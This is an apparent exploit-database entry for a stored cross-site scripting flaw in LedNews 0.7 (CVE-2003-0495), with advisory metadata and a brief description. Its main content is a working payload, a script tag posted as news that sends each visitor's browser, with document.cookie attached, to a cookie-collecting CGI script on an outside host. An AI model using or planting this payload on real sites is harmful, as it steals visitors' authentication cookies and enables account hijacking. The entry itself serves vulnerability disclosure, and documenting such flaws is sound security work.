LedNews 0.7 Post Script - Code Injection

Author: gilbert vilvoorde
type: webapps
platform: cgi
port: 
date_added: 2003-06-16 
date_updated: 2012-11-17 
verified: 1 
codes: CVE-2003-0495;OSVDB-2154 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/7920/info

It has been reported that LedNews does not properly filter input from news posts. Because of this, it may be possible for an attacker to steal authentication cookies or perform other nefarious activities.

<script>
document.location.replace('http://www.example.com/cgi-bin/cookiemonster.cgi?'+document.cookie);
</script>